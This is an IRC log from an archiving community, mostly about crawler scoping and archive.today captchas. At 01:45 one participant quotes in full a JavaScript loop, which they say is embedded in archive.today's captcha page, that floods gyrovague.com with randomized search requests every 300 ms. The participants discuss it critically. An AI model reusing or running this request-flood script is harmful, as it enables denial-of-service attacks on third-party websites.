| 00:00:02 | | sec^nd quits [Remote host closed the connection] |
| 00:00:28 | | sec^nd (second) joins |
| 00:02:52 | | Sk1d joins |
| 00:04:46 | | Dada quits [Remote host closed the connection] |
| 00:10:51 | | BornOn420 quits [Ping timeout: 272 seconds] |
| 00:12:47 | | fangfufu quits [Quit: ZNC 1.9.1+deb2+b3 - https://znc.in] |
| 00:13:18 | | fangfufu joins |
| 00:13:23 | | fangfufu is now authenticated as fangfufu |
| 00:14:02 | | sec^nd quits [Remote host closed the connection] |
| 00:14:20 | | sec^nd (second) joins |
| 00:18:17 | | etnguyen03 (etnguyen03) joins |
| 00:42:20 | | hamouda9 quits [Client Quit] |
| 00:49:05 | | Sk1d quits [Read error: Connection reset by peer] |
| 00:49:06 | | etnguyen03 quits [Remote host closed the connection] |
| 00:55:02 | | useretail quits [Remote host closed the connection] |
| 00:55:41 | | etnguyen03 (etnguyen03) joins |
| 00:57:52 | | useretail joins |
| 00:57:57 | | BornOn420 (BornOn420) joins |
| 01:18:05 | <pabs> | klea: re Moin, hackily with AB, or someone could write some code to generate an !ao list https://wiki.archiveteam.org/index.php/MoinMoin#ArchiveBot |
| 01:32:13 | <pabs> | justauser: e164.arpa results https://transfer.archivete.am/8iNc3/e164.arpa-pabs-scrape.txt |
| 01:32:13 | <eggdrop> | inline (for browser viewing): https://transfer.archivete.am/inline/8iNc3/e164.arpa-pabs-scrape.txt |
| 01:35:42 | <klea> | aaa, pita |
| 01:36:12 | <@JAA> | I have a partial implementation of scripts to make it easier, need to finish those. |
| 01:36:16 | <@JAA> | Also, #wikiteam |
| 01:37:48 | <pabs> | justauser: re archive.today, do we know what triggers the captchas? |
| 01:39:41 | <Yakov> | happens everytime when trying to save a capture with no cookies/new session |
| 01:40:32 | <Yakov> | sometimes happens when searching or when going to a capture |
| 01:42:04 | <pabs> | huh, it does now. I remember not having captchas when saving before |
| 01:43:12 | <Yakov> | pretty sure it always did, just if you solved it in the past (whether it be from going to a capture or even viewing a capture previously) it might not show |
| 01:43:44 | <pabs> | hmm |
| 01:45:09 | <Yakov> | anyways they're well aware people know about the DDoS script yet they still keep it, in fact they've mutated the DDoS script since the HN post to now use Math.random instead of Date().getTime() |
| 01:45:41 | <Yakov> | https://news.ycombinator.com/item?id=46624740 <-- previous script, current script: setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300); |
| 01:47:21 | <pokechu22> | hmm, I didn't see the script or any network traffic when I looked for it yesterday; maybe they removed it temporarily? |
| 01:48:54 | <Yakov> | i noticed that too, however i noticed the script still in the html. then i realized ublock and most adblockers now block it as mentioned in the recent gyrovague blog post |
| 01:49:29 | <Yakov> | https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/ ctrl+f "ublock" |
| 01:50:32 | <pokechu22> | I saw that but assumed it would still show up in the developer console (as blocked). I *think* I also looked in the HTML and didn't see the script, but might have just missed it |
| 01:51:07 | <Yakov> | I always assumed it would be blocked and i'm confused as well however i only glimpsed over it but i know it was definitely there |
| 01:51:13 | <Yakov> | s/always/also/ |
| 01:52:33 | <Yakov> | ublock might not be doing it (just) on a network level? Chromium with 0 extensions and the requests actually do go through and show up |
| 01:55:51 | <Yakov> | https://pastebin.com/X2aW7J1G this is the html for the captcha page for anyone who is curious (only thing i changed was i redacted my IP that was in an html comment from the server) |
| 01:55:53 | <@JAA> | I don't remember *not* seeing a captcha on URL submission (without a recent previous submission). |
| 02:08:02 | <steering> | Yakov: pastebin hid your paste |
| 02:08:05 | <steering> | pastebin-- |
| 02:08:07 | <eggdrop> | [karma] 'pastebin' now has -1 karma! |
| 02:08:24 | <Yakov> | "Pending Moderation" that happened fast |
| 02:08:31 | <steering> | doxx and malware: yes |
| 02:08:33 | <steering> | html dump: no |
| 02:09:07 | <Yakov> | alternative: https://transfer.archivete.am/64GbF/archive.today%20challenge%20html.html |
| 02:09:07 | <eggdrop> | inline (for browser viewing): https://transfer.archivete.am/inline/64GbF/archive.today%20challenge%20html.html |
| 02:10:07 | <Yakov> | wait inline is actually running the html |
| 02:10:16 | <steering> | yeah it does that |
| 02:10:29 | <Yakov> | i was really concerned for a second when i noticed a fake cloudflare challenge |
| 02:10:47 | <Yakov> | lol and it's doin the requests https://img.yakov.cloud/gXuKY.png |
| 02:12:07 | <steering> | yeah i was confused by view source not working |
| 02:12:11 | <steering> | window.history.pushState('/', '', '/'); |
| 02:12:21 | | steering shakes fist at browsers for allowing that to break view source |
| 02:12:37 | <steering> | (or just for allowing it at all, ugh) |
| 02:15:16 | <steering> | https://transfer.archivete.am/inline/bctfb/archive.today.challenge.html uploaded as text/plain |
| 02:15:39 | | steering shakes fist at transfer for not including a newline on the end of the output |
| 02:20:39 | <steering> | aaaaaaah I wish e164 was a thing |
| 02:26:59 | <pabs> | !tell egallager re that wesnoth forums post, there are a few non-404 .sf2 files on IA, found using the little-things ia-cdx-search tool https://transfer.archivete.am/cqUq9/www.freesf2.com-non-404-sf2-files.txt |
| 02:26:59 | <eggdrop> | [tell] ok, I'll tell egallager when they join next |
| 02:28:32 | <Yakov> | i really wish we could recursively archive https://www.mobileread.com/ forums, if someone can figure it out that would be great |
| 02:29:09 | <Yakov> | somehow AB got 403s on forumdisplay.php but works fine in browser? 🤷‍♂️ |
| 02:35:12 | <pabs> | hmm, wget with no UA doesn't get a 403 |
| 02:37:39 | <Yakov> | it was last done on job id 15ypiav9wiw4v40ktcxoy8dhk |
| 02:38:07 | <Yakov> | 20:58:04 <@pokechu22> https://www.mobileread.com/forums/member.php is restricted, but it also got 403s on forumdisplay.php |
| 02:38:39 | <Yakov> | s/done/queued and aborted/ |
| 02:39:13 | <pabs> | might be IP reputation, I got 200 regardless of UA with curl, using all the AB UAs |
| 02:39:26 | <Yakov> | We can try again then |
| 03:28:41 | | michaelblob quits [Quit: yoop] |
| 03:29:20 | | michaelblob joins |
| 04:02:48 | | etnguyen03 quits [Quit: Konversation terminated!] |
| 04:03:23 | | etnguyen03 (etnguyen03) joins |
| 04:15:54 | | etnguyen03 quits [Remote host closed the connection] |
| 04:19:30 | <pokechu22> | OK, yeah, I can confirm archive.today still does that, and the history modification probably is part of the problem. The way archive.today handles failed jobs is annoying in general - it makes it easy to forget what the original URL was |
| 04:19:47 | <pokechu22> | and it doesn't show up in f12 at all |
| 04:26:42 | | chunkynutz60 quits [Quit: The Lounge - https://thelounge.chat] |
| 04:26:55 | | chunkynutz60 joins |
| 04:45:23 | | Kotomind joins |
| 04:52:58 | | DogsRNice quits [Read error: Connection reset by peer] |
| 04:53:57 | | sec^nd quits [Remote host closed the connection] |
| 04:54:30 | | sec^nd (second) joins |
| 05:03:27 | | SootBector quits [Remote host closed the connection] |
| 05:04:26 | | SootBector (SootBector) joins |
| 05:04:46 | | n9nes quits [Ping timeout: 256 seconds] |
| 05:05:13 | | n9nes joins |
| 05:58:31 | | Island quits [Read error: Connection reset by peer] |
| 06:03:37 | | chunkynutz60 quits [Ping timeout: 272 seconds] |
| 06:09:05 | | nexussfan quits [Quit: Konversation terminated!] |
| 06:22:28 | | ArchivalEfforts quits [Quit: https://quassel-irc.org - Chat comfortably. Anywhere.] |
| 06:23:39 | | ArchivalEfforts joins |
| 06:34:35 | | Sluggs quits [Excess Flood] |
| 06:39:35 | | chunkynutz60 joins |
| 06:39:44 | | Sluggs (Sluggs) joins |
| 06:43:14 | | Guest quits [Read error: Connection reset by peer] |
| 06:43:16 | | Guest joins |
| 06:43:22 | | midou quits [Ping timeout: 256 seconds] |
| 06:50:14 | | barry quits [Remote host closed the connection] |
| 06:50:50 | | barry joins |
| 06:51:32 | | sec^nd quits [Remote host closed the connection] |
| 06:52:02 | | sec^nd (second) joins |
| 07:16:08 | | flotwig quits [Read error: Connection reset by peer] |
| 07:16:21 | | flotwig joins |
| 07:24:04 | | sec^nd quits [Ping timeout: 256 seconds] |
| 07:27:58 | | sec^nd (second) joins |
| 07:36:18 | | Washuu quits [Quit: Ooops, wrong browser tab.] |
| 08:35:09 | | sec^nd quits [Remote host closed the connection] |
| 08:35:35 | | sec^nd (second) joins |
| 09:34:31 | | nathang2184 quits [Ping timeout: 272 seconds] |
| 09:38:49 | | midou joins |
| 09:40:43 | | nathang2184 joins |
| 09:45:21 | | twiswist_ quits [Read error: Connection reset by peer] |
| 09:45:35 | | twiswist_ (twiswist) joins |
| 10:21:15 | | oxtyped quits [Read error: Connection reset by peer] |
| 10:28:20 | | oxtyped joins |
| 10:29:32 | <triplecamera|m> | I've been tinkering with grab-site these days. I'd like to archive <https://pdos.csail.mit.edu/6.828/{2003..2025}/>, which is served by Apache. |
| 10:30:50 | <triplecamera|m> | Apache has a feature: When you access a directory without the index file, Apache lists all files under that directory. This enables the discovery of hidden files (files without links pointing to them). |
| 10:32:17 | <triplecamera|m> | I hope that whenever wpull visits a page, it automatically pushes its parent directory into the queue. Is this possible to achieve? |
| 11:09:08 | | oxtyped quits [Ping timeout: 256 seconds] |
| 11:37:00 | | ichdasich quits [Remote host closed the connection] |
| 11:40:26 | | oxtyped joins |
| 12:00:03 | | Bleo182600722719623455222 quits [Quit: The Lounge - https://thelounge.chat] |
| 12:02:52 | | Bleo182600722719623455222 joins |
| 12:10:53 | | APOLLO03 quits [Quit: .] |
| 12:13:11 | | APOLLO03 joins |
| 12:18:23 | | Washuu joins |
| 12:24:31 | | Dada joins |
| 13:00:23 | | marcmarcos joins |
| 13:09:45 | <justauser> | pabs: I think everything interesting is on our wiki. Always on save, "bad" IPs get it on the first request, lasts for 5 minutes. |
| 13:09:46 | <justauser> | triplecamera|m: grab-site/AB won't climb up the directories on their own; this had to be implemented separately during SFDW project. |
| 13:18:20 | | Arcorann__ quits [Ping timeout: 256 seconds] |
| 13:24:25 | | marcmarcos quits [Ping timeout: 272 seconds] |
| 13:30:32 | <cruller> | You can climb the directories by executing `grab-site --which-wpull-command` and removing `--no-parent` from the output. However, I don't think this is what triplecamera wants to do. |
| 13:32:10 | | PC quits [Remote host closed the connection] |
| 13:32:23 | | PC (PC) joins |
| 13:40:58 | <cruller> | Moreover, with this method, all URLs sharing the same FQDN as the seeds end up within the scope, IIUC. |
| 13:44:54 | <masterx244|m> | i wonder if a ignore could be abused to ignore anything that is not under the /6.828 top level folder |
| 13:45:40 | <cruller> | --hostnames or similar option restricts the scope, but this also affects requisites. |
| 13:48:18 | <masterx244|m> | 5 regexes should be enough to exclude anything outside of the folder. .edu/[^6] .edu/6[^.] .edu/6.[^8] and so on until where the urls divert |
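(A quick sanity check of the character-class patterns sketched above, with a sixth pattern added for the `/6.828x` edge case; the actual ignore syntax AB/grab-site uses may differ, this is only an illustration.)

```python
import re

# Each pattern matches a URL that diverges from the ".edu/6.828/" prefix
# at a successive character position, as described in the chat.
IGNORES = [
    r"\.edu/[^6]",
    r"\.edu/6[^.]",
    r"\.edu/6\.[^8]",
    r"\.edu/6\.8[^2]",
    r"\.edu/6\.82[^8]",
    r"\.edu/6\.828[^/]",  # also catch e.g. /6.8288/
]

def is_ignored(url: str) -> bool:
    """True if the URL falls outside the /6.828/ tree."""
    return any(re.search(p, url) for p in IGNORES)
```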
| 13:48:50 | <masterx244|m> | requisites need a run through the database on ignored urls and then a --1 to fetch them without recursion |
| 13:49:10 | <justauser> | grab-site doesn't keep a DB of ignored URLs IIRC. |
| 13:49:32 | <masterx244|m> | it does :P, its inside wpull database |
| 13:50:03 | <masterx244|m> | i abused that back for the imgur hunting, crawl site and have an ignore matching everything except the target domain, afterwards wpull db to urllist and then grep |
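(The "wpull db to urllist, then grep" step could look roughly like this. The table and column names (`url_strings`, `queued_urls`, `status = 'skipped'`) are assumptions about the wpull SQLite layout and may differ between wpull versions; treat this as a sketch, not the real schema.)

```python
import sqlite3

def skipped_urls(db_path: str, substring: str) -> list[str]:
    """Pull ignored/skipped URLs containing `substring` out of a wpull DB.

    Assumed schema: url_strings(id, url) joined to
    queued_urls(url_string_id, status).
    """
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT s.url FROM queued_urls q "
            "JOIN url_strings s ON q.url_string_id = s.id "
            "WHERE q.status = 'skipped' AND s.url LIKE ?",
            (f"%{substring}%",),
        )
        return [r[0] for r in rows]
    finally:
        con.close()
```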
| 13:58:23 | | marcmarcos joins |
| 14:01:36 | <marcmarcos> | exit |
| 14:01:44 | | marcmarcos quits [Client Quit] |
| 14:16:59 | | lukash984 quits [Ping timeout: 272 seconds] |
| 14:28:01 | <cruller> | In any case, unless "Index of" pages are linked from regular pages, it's difficult to automatically push them into the queue, right? |
| 14:29:56 | | lukash984 joins |
| 14:30:08 | <justauser> | Not that hard, but needs a custom script. SFDW had one. |
| 14:30:33 | <cruller> | You might be able to do it using “--plugin-script”. But rather than that, I think it's easier to manually create a URL list from a 1st crawl and then perform a 2nd crawl. |
| 14:30:54 | <cruller> | ah yes, custom script. |
| 14:36:24 | <cruller> | BTW, in general, URLs that are in-scope but require out-of-scope resources for discovery are very troublesome. |
| 14:38:57 | | Island joins |
| 14:42:28 | <cruller> | I have no choice but to give up on orphan urls, but it's frustrating to miss urls that could be found depending on crawling rules. |
| 14:48:01 | | oxtyped quits [Ping timeout: 272 seconds] |
| 14:51:11 | | Kotomind quits [Ping timeout: 272 seconds] |
| 14:56:33 | <h2ibot> | Justauser edited Uncyclopedia (+621, Added dump links): https://wiki.archiveteam.org/?diff=60413&oldid=59310 |
| 14:57:58 | | oxtyped joins |
| 14:58:52 | <masterx244|m> | koichi: like I said: 2-stage crawl, first one to get all folders that are known, then pulling the folder indexes and processing the indexes to check if there are more URLs hidden |
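(The first stage of that approach, turning the URLs seen in crawl one into the set of "Index of" directory listings to queue for crawl two, could be sketched like this. This is a hypothetical helper, not part of grab-site or wpull.)

```python
from urllib.parse import urlsplit, urlunsplit

def parent_listings(urls):
    """Return every ancestor directory URL of the given URLs, so the
    Apache directory listings can be fetched in a second crawl."""
    out = set()
    for url in urls:
        parts = urlsplit(url)
        # Drop the leading empty segment and the final path component.
        segments = parts.path.split("/")[1:-1]
        path = "/"
        for seg in segments:
            path += seg + "/"
            out.add(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return sorted(out)
```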
| 15:00:42 | <jodizzle> | "Washington Post to make ‘significant’ cuts": https://www.semafor.com/article/02/04/2026/washington-post-to-make-significant-cuts |
| 15:01:22 | <jodizzle> | I imagine the Washington Post is thoroughly archived in several places, but just FYI. |
| 15:19:54 | | petrichor quits [Quit: ZNC 1.10.1 - https://znc.in] |
| 15:41:18 | | DogsRNice joins |
| 16:05:38 | <pabs> | pokechu22: re failed archive.today jobs, I found today that in firefox at least, hovering over the tab gives you a truncated original URL and typing that into the URL bar gets you the full URL from history |
| 16:06:50 | | Ryz2 quits [Quit: Ping timeout (120 seconds)] |
| 16:07:01 | | Ryz2 (Ryz) joins |
| 16:07:39 | <pabs> | jodizzle: I think WaPo is pretty hard to archive, ISTR AB gets errors |
| 16:10:39 | | petrichor (petrichor) joins |
| 16:38:15 | | Guest58 quits [Quit: Textual IRC Client: www.textualapp.com] |
| 16:45:57 | | Washuu quits [Quit: Ooops, wrong browser tab.] |
| 17:40:42 | | crullerIRC quits [Ping timeout: 256 seconds] |
| 17:41:56 | | crullerIRC joins |
| 17:46:48 | | cyanbox_ joins |
| 17:47:14 | | cyanbox_ quits [Read error: Connection reset by peer] |
| 17:49:47 | | cyanbox quits [Ping timeout: 272 seconds] |
| 17:57:31 | | Juest quits [Read error: Connection reset by peer] |
| 18:00:56 | | Juest (Juest) joins |
| 18:17:59 | <h2ibot> | Manu edited Distributed recursive crawls (+69, Candidates: Add www.defence.go.ug): https://wiki.archiveteam.org/?diff=60414&oldid=60181 |
| 18:27:08 | | michaelblob quits [Quit: yoop] |
| 18:30:12 | | michaelblob joins |
| 18:32:36 | | Sk1d joins |
| 18:39:44 | | nine quits [Quit: See ya!] |
| 18:39:57 | | nine joins |
| 18:39:57 | | nine is now authenticated as nine |
| 18:39:57 | | nine quits [Changing host] |
| 18:39:57 | | nine (nine) joins |
| 18:43:03 | <h2ibot> | Manu edited Discourse/archived (+89, Queued https://chiahpa.be/): https://wiki.archiveteam.org/?diff=60415&oldid=60387 |
| 18:44:03 | <h2ibot> | Manu edited Discourse/archived (+103, pokechu22 queued discussions.scouting.org): https://wiki.archiveteam.org/?diff=60416&oldid=60415 |
| 18:46:03 | <h2ibot> | Manu edited Discourse/archived (+96, Queued discuss.ipfs.tech): https://wiki.archiveteam.org/?diff=60417&oldid=60416 |
| 18:49:04 | <h2ibot> | Manu edited Discourse/archived (+100, Queued forums.rockylinux.org): https://wiki.archiveteam.org/?diff=60418&oldid=60417 |
| 18:51:04 | <h2ibot> | Manu edited Discourse/archived (+89, Queued ziggit.dev): https://wiki.archiveteam.org/?diff=60419&oldid=60418 |
| 18:53:45 | | Kabaya quits [Ping timeout: 272 seconds] |
| 19:01:59 | | Sk1d quits [Ping timeout: 272 seconds] |
| 19:12:10 | | iPwnedYourIOTSmartdog quits [Quit: Ping timeout (120 seconds)] |
| 19:12:30 | | iPwnedYourIOTSmartdog joins |
| 19:51:21 | | Wohlstand (Wohlstand) joins |
| 19:59:52 | | Wohlstand quits [Client Quit] |
| 20:13:24 | | ThreeHM quits [Quit: WeeChat 4.8.0] |
| 20:14:31 | | ThreeHM (ThreeHeadedMonkey) joins |
| 20:17:40 | | fetcher quits [Ping timeout: 256 seconds] |
| 20:23:06 | | fetcher joins |
| 20:39:41 | | lukash984 quits [Quit: The Lounge - https://thelounge.chat] |
| 20:41:14 | | lukash984 joins |
| 21:35:00 | | Sk1d joins |
| 21:42:13 | | fetcher quits [Ping timeout: 272 seconds] |
| 21:43:38 | | fetcher joins |
| 22:01:22 | | fetcher quits [Ping timeout: 256 seconds] |
| 22:06:42 | | fetcher joins |
| 22:17:32 | | flotwig quits [Quit: ZNC - http://znc.in] |
| 22:19:43 | | flotwig joins |
| 22:21:29 | | fetcher quits [Ping timeout: 272 seconds] |
| 22:23:10 | | fetcher joins |
| 22:30:22 | | Arcorann__ joins |
| 22:38:41 | | flotwig quits [Client Quit] |
| 22:48:43 | | n9nes quits [Ping timeout: 272 seconds] |
| 22:49:50 | | n9nes joins |
| 22:58:02 | | flotwig joins |
| 23:01:51 | | flotwig quits [Client Quit] |
| 23:02:09 | | Dada quits [Remote host closed the connection] |
| 23:08:06 | | flotwig joins |
| 23:11:51 | | flotwig quits [Client Quit] |
| 23:15:34 | | flotwig joins |
| 23:16:32 | | nexussfan (nexussfan) joins |
| 23:38:25 | | Arcorann__ quits [Read error: Connection reset by peer] |
| 23:39:28 | | Arcorann joins |
| 23:49:02 | | Sk1d quits [Ping timeout: 256 seconds] |